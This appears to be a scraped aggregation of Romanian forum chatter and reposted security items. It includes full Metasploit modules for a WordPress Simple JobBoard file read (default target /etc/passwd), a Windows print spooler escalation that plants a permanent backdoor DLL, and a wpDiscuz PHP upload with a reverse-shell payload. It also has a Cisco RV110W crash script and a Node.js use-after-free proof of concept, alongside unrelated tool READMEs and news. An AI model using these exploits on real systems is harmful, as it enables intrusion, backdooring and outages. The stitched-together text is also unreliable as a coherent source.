Kev

Sunt nr. din Kamasutra, vreau sa-i "rup" ipotenuza si cateta2 Multumesc tuturor pentru raspuns

Salut, vreau sa "ard" o profesoara, ce forumula matematica cat mai complexa sa compun, ca rezultatul sa fie = cu 73 sau = 69 ? https://www.wolframalpha.com

This Metasploit module exploits an authenticated directory traversal vulnerability in WordPress plugin Simple JobBoard versions prior to 2.9.3 to perform an arbitrary file read with the web server privileges. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability', 'Description' => %q{ This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3, allowing arbitrary file read with the web server privileges. }, 'Author' => [ 'Arcangelo Saracino', # Vulnerability discovery 'Hoa Nguyen - Suncsr Team', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-35749'], ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'], ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html'] ], 'DisclosureDate' => 'Jan 15 2021')) register_options([ OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']), OptString.new('USERNAME',[true,'The WordPress username to authenticate with']), OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']), OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]), ]) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def check cookie = wordpress_login(username,password) if cookie.nil? store_valid_credential(user: username, private: password, proof: cookie) return CheckCode::Safe end CheckCode::Appears end def run_host(ip) cookie = wordpress_login(username, password) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'cookie' => cookie, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'wp-admin',''), 'vars_get' => { 'post' => 'application_id', 'action' => 'edit', 'sjb_file' => "#{traversal}#{filename}" } }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_good('Downloading file ...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'Simple_JobBoard.traversal', 'text/plain', ip, res.body, fname ) print_good("File save in: #{path}") end end # 0day.today [2021-01-22] # Source

Zuccnet is a fork of https://github.com/mjkaufer/messer, a command-line client for Facebook Messenger. Only difference is, Facebook can't read your messages. It is known that Facebook scans your messages. If you need to keep using Facebook messenger but care about privacy, Zuccnet might help. It's pretty simple: you and your friend have Zuccnet installed. Your friend gives you their Zuccnet public key. Then, when you send a message to your friend on Zuccnet, your message is encrypted on your machine before it is sent across Facebook to your friend. Then, your friend's Zuccnet decrypts the message. Facebook never sees the content of your message. I'm not a security person and there's probably some stuff I've missed - any contributions are very welcome! This is very beta, don't take it too seriously. Quick Start node version 12.x required 1. Install zuccnet $ npm install -g zuccnet 2. Run zuccnet $ zuccnet 3. Enter your login details (your username and password are not stored) 4. Get your friend's public key, and assign it to them in Zuccnet $ public_key "John Smith" /Users/tomquirk/Downloads/johns_id_rsa.pub 5. Send them a message $ message "John Smith" Hey John, this is a super secret message 6. 🪄 FAQ Do you store any of my data? We don't store your username, password, or any of your interactions on Zuccnet. The only thing we store is a temporary login token when you first log in. This let's us authenticate you with Facebook without you having to enter your username and password every time. If you want to get rid of it, simply run zuccnet cleanup, or if you're in a Zuccnet session, run the logout command. Can I use a deactivated Facebook account? No, unforunately not. If you use Zuccnet with a deactivated Facebook account, your account will be reactivated. How do group chats work? Messages from group chats appear like (My cool friends) John Smith - hey guys!!$$@@ Send a message to a group by using the message command. The name is the name of the group chat! Reply works as normal Commands Reference message Sends a message to a given user (message | m) "<user>" <message> Examples message "Matthew" hello world! m "Matthew" hello world! When sending a message, Zuccnet picks the closest match to what you type in as user. For this reason, you should probably use last names if you want to avoid accidentally texting someone. reply Replys to the last message you recevied i.e. Sends a message to the user of the most recently received message. (reply | r) <message> Example r "hey yo this is my reply" Note: this will only work if you have received at least one message through Zuccnet. contacts Lists all of your Facebook friends contacts history Displays the last n messages in the conversation with a given user. The number of messages to retrieve are optional (default is 5). (history | h) "<user>" [<n>] Examples history "Matthew" 10 h "Matthew" recent Displays the n most recent conversations. The number of threads is optional (default is 5). The --history option will display the 5 most recent messages in each thread. recent [<n>] [--history] Examples recent recent 10 recent --history clear Clears the number of unread messages in the window title. Since we cannot listen on focus events, it has to be done manually. (clear | c) logout Logs you out logout mute Mutes a thread. If no seconds are specified, the thread is muted indefinetely. mute "<thread-name>" [seconds] unmute Unmutes a thread unmute "<thread-name>" settings Configure your user settings on Zuccnet settings (set | get | list) [<key>=<value>] Examples settings list settings get SHOW_READ settings set SHOW_READ=true For supported settings, see section below Supported Settings SHOW_READ Marks conversation as "read" when using clear command Lock-on Mode Locking on to a user or group allows you to send messages without having to specify the message command; just type away! lock "Tom Q" To unlock, simply run: --unlock Secret Mode When in this mode, any messages sent or recieved in the thread will be deleted for you (note, they won't be deleted for everyone). lock "Tom Q" --secret Non-interactive Mode Zuccnet can be run in non-interactive mode with command line arguments to execute a single command. zuccnet --command='<command>' Login will be prompted if this is the first time logging in. Examples zuccnet --command='m "John Smith" Hey, John' zuccnet --command='r Hey, John' Cleanup If ever you want to clean up any old Zuccnet sessions and start from scratch, run: $ zuccnet cleanup Contributing Want to add a new command, fix a bug or improve Zuccnet in another way? Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us. License This project is licensed under the ISC License - see the LICENSE file for details Download zuccnet-master.zip or git clone https://github.com/tomquirk/zuccnet.git Source

FaceCompare FaceCompare is a simple app for finding similar photos. It will help you to find duplicates of your photos only by face, no matter how much they have been changed. Download (Only for macOS 10.15 and higher) Screenshot: Source

Color attribute https://playfairdata.com/3-ways-make-handsome-highlight-tables-tableau/

This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/windows/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE include Msf::Post::Windows::Powershell prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability', 'Description' => %q{ This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peleg Hadar', # Original discovery 'Tomer Bar', # Original discovery '404death', # PoC 'sailay1996', # PoC 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2019-11-04', 'References' => [ ['CVE', '2020-1337'], ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'], ['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'], ['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] ) ) register_options([ OptString.new('JUNCTION_PATH', [false, 'Path to use as junction (%TEMP%/%RAND% by default).', nil]), OptString.new('DESTINATION_PATH', [false, 'Location of file to overwrite (%WINDIR%\system32\ by default).', nil]), OptString.new('DESTINATION_FILE', [false, 'Filename to overwrite (ualapi.dll by default).', nil]), OptString.new('PRINTER_NAME', [true, 'Printer Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]), OptBool.new('RESTART_TARGET', [false, 'Restart the target after exploit (you will lose your session until a second reboot).', false]) ]) end def cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, b64_payload) # Read in Generic Script script = exploit_data('CVE-2020-1337', 'cve-2020-1337.ps1') fail_with(Failure::BadConfig, 'No exploit script found') if script.nil? # Replace Values in Generic Script vprint_status('Replacing variables') junction_filepath = "#{junction_path}\\#{destination_file}" # The random string appears to be required when using the psh_exec # It may be due to the way we break apart the script? # I would not be upset to find the root cause and fix it. script.gsub!('JUNCTION_FILEPATH', junction_filepath) script.gsub!('PRINTER_NAME', printer_name) script.gsub!('JUNCTION_PATH', junction_path) script.gsub!('DESTINATION_PATH', destination_path) script.gsub!('B64_PAYLOAD_DLL', b64_payload) # Run Exploit Script print_status("Running Exploit on #{sysinfo['Computer']}") begin #client.powershell.execute_string(code: script) session.powershell.execute_string({code: script}) rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end end def exploit if datastore['DESTINATION_PATH'].nil? || datastore['DESTINATION_PATH'].empty? win_dir = session.sys.config.getenv('windir') destination_path = "#{win_dir}\\system32" else destination_path = datastore['DESTINATION_PATH'] end if datastore['DESTINATION_FILE'].nil? || datastore['DESTINATION_FILE'].empty? destination_file = 'ualapi.dll' else destination_file = datastore['DESTINATION_FILE'] end if datastore['JUNCTION_PATH'].nil? || datastore['JUNCTION_PATH'].empty? junction_path = "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..15)}" else junction_path = datastore['JUNCTION_PATH'] end client.core.use("powershell") if not client.ext.aliases.include?("powershell") printer_name = datastore['PRINTER_NAME'] payload_dll = generate_payload_dll # Check target vprint_status('Checking Target') validate_active_host validate_payload # Run the exploit output = cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, Rex::Text.encode_base64(payload_dll)) sleep(3) # make sure exploit is finished # Reboot, if desired if datastore['RESTART_TARGET'] sleep(10) vprint_status("Rebooting #{sysinfo['Computer']}") begin session.sys.power.reboot rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end end end def validate_active_host begin print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog('Could not connect to session', error: e) raise Msf::Exploit::Failed, 'Could not connect to session' end end def validate_payload vprint_status("Target Arch = #{sysinfo['Architecture']}") vprint_status("Payload Arch = #{payload.arch.first}") unless payload.arch.first == sysinfo['Architecture'] fail_with(Failure::BadConfig, 'Payload arch must match target arch') end end def check sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Build Number = #{build_num}") return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363 return Exploit::CheckCode::Safe end end # 0day.today [2021-01-19] # Source

Double Patterns in cazul in care nu este gainar si nu poate face flash

Whitepaper called UFW - A Beginners Guide to Linux Firewall. The white paper is intended to provide information about a Linux firewall using a simple tool called UFW. It provides complete information on the tool and various ways through which users can create their own firewall rules to protects their assets. Download wget https://packetstormsecurity.com/files/download/160970/ufw-beginnersguide.pdf Source

//

De ce vaccin si nu antidot?

Cisco RV110W version 1.2.1.7 vpn_account denial of service proof of concept exploit. # Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC) # Exploit Author: Shizhi He # Vendor Homepage: https://www.cisco.com/ # Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7 # Version: V1.2.1.7 # Tested on: RV110W V1.2.1.7 # CVE : CVE-2021-1167 # References: # https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U #!/usr/bin/env python2 ##### ## Cisco RV110W Remote Stack Overflow. ### Tested on version: V1.2.1.7 (maybe useable on other products and versions) import os import sys import re import urllib import urllib2 import getopt import json import hashlib import ssl ssl._create_default_https_context = ssl._create_unverified_context ### # Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco # This PoC will crash the target HTTP/HTTPS service ### #encrypt password def enc(s): l = len(s) s += "%02d" % l mod = l + 2 ans = "" for i in range(64): tmp = i % mod ans += s[tmp] return hashlib.md5(ans).hexdigest() if __name__ == "__main__": print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco" IP = sys.argv[1] PORT = sys.argv[2] USERNAME = sys.argv[3] PASSWORD = enc(sys.argv[4]) url = 'https://' + IP + ':' + PORT + '/' #get session_id by POST login.cgi req = urllib2.Request(url + "login.cgi") req.add_header('Origin', url) req.add_header('Upgrade-Insecure-Requests', 1) req.add_header('Content-Type', 'application/x-www-form-urlencoded') req.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req.add_header('Referer', url) req.add_header('Accept-Encoding', 'gzip, deflate') req.add_header('Accept-Language', 'en-US,en;q=0.9') req.add_header('Cookie', 'SessionID=') data = {"submit_button": "login", "submit_type": "", "gui_action": "", "wait_time": "0", "change_action": "", "enc": "1", "user": USERNAME, "pwd": PASSWORD, "sel_lang": "EN" } r = urllib2.urlopen(req, urllib.urlencode(data)) resp = r.read() login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] print session_id #trigger stack overflow through POST vpn_account parameter and cause denial of service req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) req2.add_header('Origin', url) req2.add_header('Upgrade-Insecure-Requests', 1) req2.add_header('Content-Type', 'application/x-www-form-urlencoded') req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req2.add_header('Referer', url) req2.add_header('Accept-Encoding', 'gzip, deflate') req2.add_header('Accept-Language', 'en-US,en;q=0.9') req2.add_header('Cookie', 'SessionID=') poc = "a" * 4096 data_cmd = { "gui_action": "Apply", "submit_type": "", "submit_button": "vpn_client", "change_action": "", "pptpd_enable": "0", "pptpd_localip": "10.0.0.1", "pptpd_remoteip": "10.0.0.10-14", "pptpd_account": "", "vpn_pptpd_account": "1", "vpn_account": poc, "change_lan_ip": "0", "netbios_enable": "0", "mppe_disable": "0", "importvpnclient": "", "browser": "", "webpage_end": "1", } r = urllib2.urlopen(req2, urllib.urlencode(data_cmd)) resp = r.read() print resp # 0day.today [2021-01-15] # Source

The ContentFilterExclusionList has been removed in macOS 11.2 beta 2. Image: Markus Spiske Apple has removed a controversial feature from the macOS operating system that allowed 53 of Apple's own apps to bypass third-party firewalls, security tools, and VPN apps installed by users for their protection. Known as the ContentFilterExclusionList, the list was included in macOS 11, also known as Big Sur. The exclusion list included some of Apple's biggest apps, like the App Store, Maps, and iCloud, and was physically located on disk at: /System/Library/Frameworks/NetworkExtension.framework/Versions/Current/Resources/Info.plist. Image: Simone Margaritelli Its presence was discovered last October by several security researchers and app makers who realized that their security tools weren't able to filter or inspect traffic for some of Apple's applications. Security researchers such as Patrick Wardle, and others, were quick to point out at the time that this exclusion risk was a security nightmare waiting to happen. They argued that malware could latch on to legitimate Apple apps included on the list and then bypass firewalls and security software. Besides security pros, the exclusion list was widely panned by privacy experts alike, since macOS users also risked exposing their real IP address and location when using Apple apps, as VPN products wouldn't be able to mask users' location. APPLE SAID IT WAS TEMPORARY Contacted for comment at the time, Apple told ZDNet the list was temporary but did not provide any details. An Apple software engineer later told ZDNet the list was the result of a series of bugs in Apple apps, rather than anything nefarious from the Cupertino-based company. The bugs were related to Apple deprecating network kernel extensions (NKEs) in Big Sur and introducing a new system called Network Extension Framework, and Apple engineers not having enough time to iron out all the bugs before the Big Sur launch last fall. But some of these bugs have been slowly fixed in the meantime, and, yesterday, with the release of macOS Big Sur 11.2 beta 2, Apple has felt it was safe to remove the ContentFilterExclusionList from the OS code (as spotted by Wardle earlier today). Once Big Sur 11.2 is released, all Apple apps will once again be subject to firewalls and security tools, and they'll be compatible with VPN apps. Via zdnet.com

poate te ajuta si ceva de genul https://www.emag.ro/stabilizator-automat-de-tensiune-cu-servo-motor-1000va-well-avr-srv-constant1000-wl/pd/D5MMZWBBM/

Trimite-mi pm cu ceva keywords

infrabot.io - easily control your infrastructure with Telegram bot infrabot is a system service which allows you to create your own commandlets to control your infrastructure using Telegram Bot Documentation Get started with infrabot, learn how to configure infrabot for your organization config.json and with Infrabot UI Configurator. Getting Started Configure Bot Config file Overview GUI Tool Infrabot Service Demo Setup Prerequisites Install .NET Core 5.0.0 Download infrabot-main.zip or https://github.com/infrabot-io/infrabot.git Source

GKE Auditor A tool to detect a set of common Google Kubernetes Engine misconfigurations. Aimed to help security and development teams streamline configuration parts of their processes, and save time looking for generic bugs and vulnerabilities. The tool consists of individual modules called Detectors, each scanning for a specific vulnerability. This is not an officially supported Google product. Dependencies JDK 11 or later Maven Google Cloud SDK kubectl To install the dependencies on Debian, run: install-debian.sh If the tool is run from a GCP Cloud shell, all the above mentioned dependencies should be pre-installed in the Shell. To access the Cloud Shell, use the Google Cloud Console or SSH into it by running: gcloud alpha cloud-shell ssh after installing the Google Cloud SDK into your local machine. Installation git clone https://github.com/google/gke-auditor cd ./gke-auditor/ ./build.sh Authentication Before running the tool, make sure to configure access to your cluster. gcloud init gcloud auth login gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE Usage The tool has to be built by running the build.sh script first. Once the tool is built, it can be run using the auditor.sh script, using the following options: ./auditor.sh [-a] [-ast] [-c] [-d] [-h] [-i <arg>] [-p <arg>] [-q] [-r <arg>] -a,--all Run all detectors. -ast,--assets Run all detectors for each individual asset. -c,--color Turns on tool output coloring. -d,--defaults Runs detectors including Kubernetes default assets. Disabled by default. -h,--help Print help information. -i,--iso <arg> Run Node Isolation detectors. To run all detectors, omit the argument list. To specify individual detectors to run, give a list of indices: 1. NODE_SELECTOR_POD_REJECTED 2. NODE_TAINTS_POD_REJECTED 3. NODE_AFFINITY_POD_REJECTED -p,--psp <arg> Run PSP (Pod Security Policy) detectors. To run all detectors, omit the argument list. To specify individual detectors to run, give a list of indices: 1. PRIVILEGED_CONTAINERS 2. CONTAINERS_SHARING_HOST_PROCESS_ID_NAMESPACE 3. CONTAINERS_SHARING_HOST_IPC 4. CONTAINER_SHARING_HOST_NETWORK_NAMESPACE 5. CONTAINERS_ALLOW_PRIVILEGE_ESCALATION 6. ROOT_CONTAINERS_ADMISSION 7. CONTAINERS_NET_RAW_CAPABILITY 8. CONTAINERS_ADDED_CAPABILITIES 9. CONTAINERS_CAPABILITIES_ASSIGNED -q,--quiet Prints out only misconfigurations, without additional detector info. Disabled by default. -r,--rbac <arg> Run RBAC (Role Based Access Control) detectors. To run all detectors, omit the argument list. To specify individual detectors to run, give a list of indices: 1. CLUSTER_ADMIN_ROLE_USED 2. SECRET_ACCESS_ALLOWED 3. WILDCARD_USED 4. CREATE_PODS_ALLOWED 5. AUTOMOUNT_SERVICE_ACCOUNT_TOKEN_ENABLED 6. ESCALATING_RESOURCES_REPORT Examples Run all detectors ./auditor.sh or ./auditor.sh --all Run specific detectors ./auditor.sh --iso 1 --psp 2,3 --rbac This will run the first isolation detector (NODE_SELECTOR_POD_REJECTED), second and third PSP detectors (CONTAINERS_SHARING_HOST_PROCESS_ID_NAMESPACE, CONTAINERS_SHARING_HOST_IPC) and all RBAC detectors. Detectors can be chosen by specifying a list of indices in accordance with the lists given in the help section of the tool. Run detectors for individual assets ./auditor.sh --assets # Runs all detectors. ./auditor.sh --assets --iso 0 --psp 1,2 --rbac # Runs only specified detectors. A detector auditing assets for vulnerabilities individually: instead of running a detector on all available assets, runs all detectors on a single asset at a time. Additional features In addition to the above listed example, the tool can be run with following options: Coloring ./auditor.sh -c Vulnerabilities will be colored in red. Quiet mode ./auditor.sh -q Quiet mode: no additional information about vulnerabilities will be printed out besides the detector names and vulnerable assets found. Including K8s defaults ./auditor.sh -d Includes K8s defaults in the audit. A default K8s cluster will have some configurations which might be considered vulnerable by the tool. Those configurations are excluded from the audit by default, but including those defaults might be useful for some researchers (e.g. those auditing K8s itself). Detector Information For detailed information about the vulnerabilities the detectors are checking for, refer to OUTPUTS.md. References Some of the implemented detectors refer to CIS Benchmarks. Contributing See CONTRIBUTING.md. License Copyright 2020 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Download gke-auditor-master.zip or git clone https://github.com/google/gke-auditor.git Source

Se face spread de mult prin stick. Nu am citit articolul complet.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. }, 'Author' => [ 'Chloe Chamberland', # Vulnerability Discovery, initial msf module 'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '10333'], ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'], ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'], ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wpDiscuz < 7.0.5', {}]], 'DisclosureDate' => 'Feb 21 2020', 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0)) register_options [ OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]), ] end def check check_plugin_version_from_readme('wpdiscuz','7.0.5') end def blogpath datastore['BLOGPATH'] end def find_wmusecurity_id res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5) wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures return wmusecurity_id end def exploit wmusecurity_id = find_wmusecurity_id[0] php_page_name = rand_text_alpha(5 + rand(5)) + '.php' data = Rex::MIME::Message.new data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"') data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"') data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"') data.add_part('1', nil, nil, 'form-data; name="postId"') data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) time = Time.new year = time.year.to_s month = "%02d" % time.month regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/) wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"") if res if res.code == 200 && res.body =~ /#{php_page_name}/ print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, "#{peer} - Server did not answer") end print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)}, 5 ) end end # 0day.today [2021-01-09] # Source

An audit is underway into the Judiciary's Case Management/Electronic Case Files system. The United States Judiciary has announced an audit into its systems, following concerns its case file system has been compromised. In making the announcement, the Judiciary said the Administrative Office of the US Courts was working with the Department of Homeland Security on a security audit relating to vulnerabilities in the Judiciary's Case Management/Electronic Case Files system (CM/ECF) that greatly risk compromising highly sensitive non-public documents, particularly sealed filings. With the investigation ongoing, Judiciary said federal courts across the country will be adding new security procedures aimed at protecting highly sensitive confidential documents filed with the courts. Moving forward, highly sensitive court documents filed with federal courts will be accepted for filing in paper form or via a "secure electronic device", such as a thumb drive, and stored in a "secure, stand-alone computer system". The documents will not be uploaded to CM/ECF. Filings not considered highly sensitive will continue to be sealed in CM/ECF "as necessary". The Judiciary said following guidance from the Department of Homeland Security, its courts have suspended all national and local use of SolarWinds Orion products. Earlier this week, the US Department of Justice (DOJ) confirmed that the hackers behind the SolarWinds supply chain attack targeted its IT systems, where they escalated access from the trojanized SolarWinds Orion app to move across its internal network and access the email accounts of some of its employees. The number of impacted DOJ employees is currently believed to be around 3,000 to 3,450. The DOJ said it has now blocked the attacker's point of entry. Four US cybersecurity agencies on Monday released a joint statement formally accusing the Russian government of orchestrating the SolarWinds supply chain attack. US officials said that "an advanced persistent threat actor, likely Russian in origin" was responsible for the SolarWinds hack, which officials described as "an intelligence gathering effort". Via zdnet.com

Node.js: use-after-free in TLSWrap Node v14.11.0 (Current) is vulnerable to a use-after-free bug in its TLS implementation. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure: // stream_base-inl.h WriteWrap* req_wrap = CreateWriteWrap(req_wrap_obj); err = DoWrite(req_wrap, bufs, count, send_handle); bool async = err == 0; if (!async) { req_wrap->Dispose(); req_wrap = nullptr; } const char* msg = Error(); if (msg != nullptr) { req_wrap_obj->Set(env->context(), env->error_string(), OneByteString(env->isolate(), msg)).Check(); ClearError(); } return StreamWriteResult { async, err, req_wrap, total_bytes }; The problem is that TLSWrap::DoWrite can trigger a free of the WriteWrap object without returning an error when the EncOut() call at the end of the DoWrite method fails. EncOut() calls underlying_stream()->Write() to write TLS encrypted data to the network socket. If this write fails, InvokeQueued() is called and the function returns immediately: // tls_wrap.cc // Write any encrypted/handshake output that may be ready. // Guard against sync call of current_write_->Done(), its unsupported. in_dowrite_ = true; EncOut(); in_dowrite_ = false; return 0; // tls_wrap.cc void TLSWrap::EncOut() { [...] Debug(this, \"Writing %zu buffers to the underlying stream\", count); StreamWriteResult res = underlying_stream()->Write(bufs, count); if (res.err != 0) { InvokeQueued(res.err); return; } [..] InvokeQueued() triggers an immediate free of the req_wrap WriteWrap* object via the following call chain: node::TLSWrap::InvokeQueued -> node::StreamReq::Done -> node::WriteWrap::OnDone -> node::StreamReq::Dispose -> node::BaseObjectPtrImpl<node::AsyncWrap, false>::~BaseObjectPtrImpl() -> node::BaseObject::decrease_refcount() -> node::SimpleWriteWrap<node::AsyncWrap>::~SimpleWriteWrap() Making underlying_stream()->Write fail is as easy as closing the socket at the other side of the connection just before the write to trigger a broken pipe error. Because node::TLSWrap::DoWrite doesn't return an error code, node::StreamBase::Write will return the freed WriteWrap object as part of its StreamWriteResult. For calls by node::StreamBase::WriteV, this will immediately trigger a use-after-free when the SetAllocatedStorage() method is called on the freed object: // stream_base.cc StreamWriteResult res = Write(*bufs, count, nullptr, req_wrap_obj); SetWriteResult(res); if (res.wrap != nullptr && storage_size > 0) { res.wrap->SetAllocatedStorage(std::move(storage)); } The bug can be easily triggered against a simple node HTTPS server application. Under normal circumstances and without an ASAN enabled build, the UAF doesn't trigger a crash on Linux as the freed memory won't get reallocated in time and the write in SetAllocatedStorage corrupts chunk metadata that isn't used for small chunks. I think this is the only reason why the bug wasn't spotted earlier, as the broken pipe error path should be hit pretty often in the real world. However, this issue might still be exploitable with the right heap layout (if the WriteWrap chunk is merged with a larger chunk during the free), different heap implementations and/or some other control flow that allows to allocate something before the reuse. Proof-of-Concept: server.js: const https = require('https'); const key = `-----BEGIN EC PARAMETERS----- BggqhkjOPQMBBw== -----END EC PARAMETERS----- -----BEGIN EC PRIVATE KEY----- MHcCAQEEIDKfHHbiJMdu2STyHL11fWC7psMY19/gUNpsUpkwgGACoAoGCCqGSM49 AwEHoUQDQgAEItqm+pYj3Ca8bi5mBs+H8xSMxuW2JNn4I+kw3aREsetLk8pn3o81 PWBiTdSZrGBGQSy+UAlQvYeE6Z/QXQk8aw== -----END EC PRIVATE KEY-----` const cert = `-----BEGIN CERTIFICATE----- MIIBhjCCASsCFDJU1tCo88NYU//pE+DQKO9hUDsFMAoGCCqGSM49BAMCMEUxCzAJ BgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5l dCBXaWRnaXRzIFB0eSBMdGQwHhcNMjAwOTIyMDg1NDU5WhcNNDgwMjA3MDg1NDU5 